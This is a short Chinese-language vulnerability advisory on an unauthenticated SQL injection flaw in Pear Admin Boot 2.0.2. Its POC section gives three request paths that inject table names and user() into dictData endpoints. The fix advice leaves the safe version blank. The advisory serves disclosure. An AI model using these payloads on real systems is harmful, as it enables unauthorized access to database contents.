漏洞预警 | Pear-Admin-Boot SQL注入漏洞

0x00 漏洞编号

• 暂无

0x01 危险等级

• 高危

0x02 漏洞概述

Pear Admin Boot是一个基于Spring Boot和Vue.js的开源后台管理系统框架。

0x03 漏洞详情

漏洞类型：SQL注入

影响：获取敏感信息

简述：Pear Admin Boot存在SQL注入漏洞，未授权的攻击者可以通过该漏洞拼接执行恶意SQL语句，导致数据库信息泄露。

0x04 影响版本

• Pear Admin Boot 2.0.2

0x05 POC

{{BaseUrl}}/system/dictData/getDictItems/gen_table,user(),1,1{{BaseUrl}}/system/dictData/getDictItems/sys_user,user(),1{{BaseUrl}}/system/dictData/loadDictItem/sys_user,user(),1?key=1

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本平台和发布者不为此承担任何责任。